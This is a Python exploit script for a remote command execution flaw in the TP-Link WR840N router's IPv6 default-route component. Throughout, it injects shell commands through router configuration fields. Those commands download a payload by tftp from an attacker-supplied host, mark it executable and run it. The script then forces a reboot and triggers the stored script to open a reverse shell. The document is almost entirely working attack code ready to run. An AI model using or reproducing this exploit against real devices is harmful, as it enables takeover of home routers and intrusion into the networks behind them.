#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Samir Sanchez Garnica and Luis Jacome Valencia
# Description: This script exploits a remote command execution vulnerability under the oal_setIp6DefaultRoute component in the TPLink WR840N router.

import requests
import base64
import argparse

class RCE():
    def __init__(self, ip, username, password, lhost):
        self.ip = ip
        self.username = username
        self.password = password
        self.lhost = lhost
        self.session = requests.Session()
        self.command_1 = ";tftp -g -r s -l /var/tmp/dconf/s {}".format(self.lhost)
        self.command_2 = ";chmod +x /var/tmp/dconf/s"
        self.command_3 = ";./var/tmp/dconf/s"
    
    def base64_encode(self, s):
        msg_bytes = s.encode('ascii')
        return base64.b64encode(msg_bytes)

    def exploit(self):
        # Building the malicious packet
        
        self.url = "http://" + self.ip + "/cgi?2"
        self.proxyes = {}
        self.stage_1 = '[NOIP_DNS_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,5\r\nenable=1\r\nuserName={0}\r\npassword={1}\r\nuserDomain={2}\r\nlogin=1\r\n'.format(self.command_1, self.command_2, self.command_3)
        self.stage_2 = '[L3_IP6_FORWARDING#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\n__ifAliasName=ewan_ipoev6_d\r\n__ifName=;reboot;\r\ndefaultConnectionService=\r\n'
        self.stage_3 = '[L3_IP6_FORWARDING#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\n__ifAliasName=ewan_ipoev6_d\r\n__ifName=;sh */t*/d*/n*;\r\ndefaultConnectionService=\r\n'

    
        self.headers = {
            'Host': self.ip,
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0',
            'Accept': '*/*',
            'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'text/plain',
            'Content-Length': 'str(len(self.payload))',
            'Origin': 'http://'+str(self.ip),
            'Referer': 'http://'+str(self.ip)+'/mainFrame.htm',
        }
        
        self.cookies = { 'Authorization' : 'Basic ' + self.base64_encode(self.username + ":" + self.password).decode('ascii') }
        
        self.response = self.session.post(self.url, headers=self.headers, cookies=self.cookies, data=self.stage_1, proxies=self.proxyes)
        if self.response.status_code == 200:
            print("[+] Sending Stage 1, allocate command in /var/tmp/dconf/noipdns.conf")
            
            try:
                self.response = self.session.post(self.url, headers=self.headers, cookies=self.cookies, data=self.stage_2, proxies=self.proxyes, verify=False, timeout=10)
            except:
                print("[+] Sending Stage 2, reboot device and get new configuration 2")
                input("[+] waiting reconnect to wireless device, press enter to send stage 3 and obtained reverse shell")
                            
            self.response = self.session.post(self.url, headers=self.headers, cookies=self.cookies, data=self.stage_3, proxies=self.proxyes)
            if self.response.status_code == 200:
                print("[+] Getting reverse shell....")
        

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("--username", dest="username", help="Enter the administrator user of the router", required=True)
    parser.add_argument("--password", dest="password", help="Enter the admin password of the router", required=True)
    parser.add_argument("--target", dest="target", help="Enter router ip address", required=True)
    parser.add_argument("--lhost", dest="lhost", help="Enter your lhost server tfpt", required=True)
    args = parser.parse_args()
    
    if args.username and args.password and args.target and args.lhost:
        rce = RCE(args.target, args.username, args.password, args.lhost)
        rce.exploit()

if __name__ == "__main__":
    main()